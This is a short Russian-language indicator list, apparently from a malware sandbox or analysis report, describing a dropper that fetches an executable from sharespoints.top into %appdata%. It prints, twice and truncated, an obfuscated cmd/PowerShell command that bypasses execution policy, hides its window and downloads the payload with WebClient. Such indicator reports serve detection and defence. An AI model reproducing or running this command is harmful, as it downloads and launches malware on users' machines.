Техническая информация
- http://sharespoints.top/pointsexcels.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwerS^hE^lL.exe -^eXeCU^T^ioNPolIcy^ ByPASs -N^OPRO^FI^Le^ -^W^I^NdOWST^yle hID^d^en (^NeW-Obje^ct sy^SteM.NeT.^wEb^cL^Ie^N^T^)^.DOWnlOa^dF^Ile('http://sharespoints.top/points...
- DNS ASK sh####points.top
- '<SYSTEM32>\cmd.exe' /c "POwerS^hE^lL.exe -^eXeCU^T^ioNPolIcy^ ByPASs -N^OPRO^FI^Le^ -^W^I^NdOWST^yle hID^d^en (^NeW-Obje^ct sy^SteM.NeT.^wEb^cL^Ie^N^T^)^.DOWnlOa^dF^Ile('http://sharespoints.top/points...' (со скрытым окном)